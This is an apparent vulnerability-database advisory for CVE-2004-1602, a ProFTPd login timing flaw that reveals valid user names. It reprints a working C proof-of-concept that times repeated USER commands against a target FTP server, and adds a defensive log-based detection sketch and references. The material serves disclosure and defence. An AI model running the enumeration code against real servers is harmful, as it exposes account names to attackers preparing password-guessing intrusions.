ProFTPd Login Timing Difference User Account Disclosure Vulnerability

Vulnerability ID: 1108228    Vulnerability type: Design error
Published: 2004-10-17    Updated: 2005-10-20
CVE ID: CVE-2004-1602
CNNVD-ID: CNNVD-200410-018
Platform: Linux    CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/581
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200410-018
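|Vulnerability details
ProFTPd is a popular FTP server. When processing the 'USER' command, ProFTPd handles invalid user names with a timing difference, which a remote attacker can exploit to confirm valid user account names. The LSS Security Team reported that valid account names can be identified by timing analysis of the code execution paths in the ProFTPd login procedure. By measuring the difference in time between sending the 'USER' command and receiving the reply, a remote user can determine whether an account is valid.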
|Exploit
/* 
Details 
Vulnerable Systems:
* ProFTPD Version 1.2.10 and below

It is possible to determine which user names are valid, which are special, and which ones do not exist on the remote system. This can be accomplished by code execution path timing analysis attack at the ProFTPd login procedure. There is a very small (but significant) difference in time delay of code execution path between valid and non-valid user names. That can be used to remotely determine the difference between existent and non-existent users. The time delay can be measured by using a simple FTP client that will calculate elapsed time between 'USER' command sent by client, and the server response. Because of the very short response period, elapsed time should be measured in microseconds.

Proof of Concept Code:
LSS has developed simple PoC exploit that is presented here:

// ProFTPd remote users discovery based on code execution time - POC exploit
// Coded by Leon Juranic // http://www.lss.hr
*/

#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>   /* exit */
#include <string.h>   /* strlen */
#include <strings.h>  /* bzero */
#include <unistd.h>   /* read, write, close */

#define PORT 21
#define PROBE 8

int main (int argc, char **argv)
{
    int sock,n,y;
    long dist,stat=0;
    struct sockaddr_in sin;
    char buf[1024], buf2[1024];
    struct timeval tv, tv2;
    struct timezone tz, tz2;

    printf ("Proftpd remote users discovery exploit\n"
            " Coded by Leon / LSS Security\n"
            ">-------------------------------------<\n");

    /* argv[1] is passed to inet_addr(), argv[2] is the user name to test */
    if (argc != 3) { printf ("usage: %s <ip-address> <username>\n",argv[0]); exit(0); }

    sock = socket (AF_INET, SOCK_STREAM, 0);
    sin.sin_family = AF_INET;
    sin.sin_port = htons (PORT);
    sin.sin_addr.s_addr = inet_addr (argv[1]);
    bzero (sin.sin_zero,8);

    connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));

    printf ("Login time: ");
    /* read the server greeting before timing anything */
    n = read (sock,buf2, sizeof(buf2));
    for (y=0;y<PROBE;y++) {
        /* time one USER command / reply round trip */
        gettimeofday (&tv,&tz);
        snprintf (buf, sizeof(buf)-1,"USER %s\r\n",argv[2]);
        write (sock, buf, strlen(buf));
        n = read (sock,buf2, sizeof(buf2));
        gettimeofday (&tv2,&tz2);
        /* difference of the microsecond fields only, as in the original PoC */
        dist =tv2.tv_usec - tv.tv_usec;
        stat += dist;
        printf (" %ld |",dist);
    }
    printf ("\nAvrg: %ld\n",(stat/PROBE));
    close (sock);
    return 0;
}

// milw0rm.com [2004-10-17]
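
Detection sketch for the traffic pattern the PoC above produces (an added example, not part of the original advisory or of ProFTPD): the PoC sends PROBE (8) back-to-back USER commands on one control connection and never sends PASS. The "<session-id> <FTP command>" log format, the threshold of 4, and the name find_user_probes are assumptions, and the sample lines are constructed.

```c
#include <stdio.h>
#include <strings.h>

#define MAX_SESS 16
#define USER_THRESHOLD 4  /* assumed policy: 4+ USERs with no PASS in between */

/* Constructed sample in an assumed "<session-id> <FTP command>" format;
   this is not ProFTPD's real log format. Session 2 mimics the PoC's 8 probes. */
static const char *sample_log[] = {
    "1 USER alice", "1 PASS ****", "1 LIST",
    "2 USER root", "2 USER root", "2 USER root", "2 USER root",
    "2 user root", "2 USER root", "2 USER root", "2 USER root",
    "3 USER bob", "3 USER bob", "3 PASS ****", "3 QUIT",
};
#define SAMPLE_LEN ((int)(sizeof sample_log / sizeof *sample_log))

/* Flags sessions that send USER_THRESHOLD or more USER commands without a
   PASS in between. Returns the number flagged; ids are written to flagged[]. */
int find_user_probes(const char **lines, int n, int *flagged, int max_flagged)
{
    int run[MAX_SESS] = {0};       /* USERs since the last PASS, per session */
    int reported[MAX_SESS] = {0};  /* report each session only once */
    int count = 0;

    for (int i = 0; i < n; i++) {
        int sid; char cmd[16];
        if (sscanf(lines[i], "%d %15s", &sid, cmd) != 2 ||
            sid < 0 || sid >= MAX_SESS) continue;  /* skip malformed lines */
        if (strcasecmp(cmd, "USER") == 0) {        /* FTP verbs are case-insensitive */
            if (++run[sid] >= USER_THRESHOLD && !reported[sid]) {
                reported[sid] = 1;
                if (count < max_flagged) flagged[count++] = sid;
            }
        } else if (strcasecmp(cmd, "PASS") == 0) {
            run[sid] = 0;          /* a normal login attempt resets the run */
        }
    }
    return count;
}

int main(void)
{
    int flagged[MAX_SESS];
    int n = find_user_probes(sample_log, SAMPLE_LEN, flagged, MAX_SESS);
    for (int i = 0; i < n; i++)
        printf("session %d: repeated USER without PASS\n", flagged[i]);
    return 0;
}
```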
|References

Source: SECTRACK
Name: 1011687
Link: http://securitytracker.com/id?1011687
Source: security.lss.hr
Link: http://security.lss.hr/index.php?page=details&ID=LSS-2004-10-02
Source: BUGTRAQ
Name: 20041015 ProFTPD 1.2.x remote users enumeration bug
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=109786760926133&w=2
Source: XF
Name: proftpd-info-disclosure(17724)
Link: http://xforce.iss.net/xforce/xfdb/17724
Source: BID
Name: 11430
Link: http://www.securityfocus.com/bid/11430
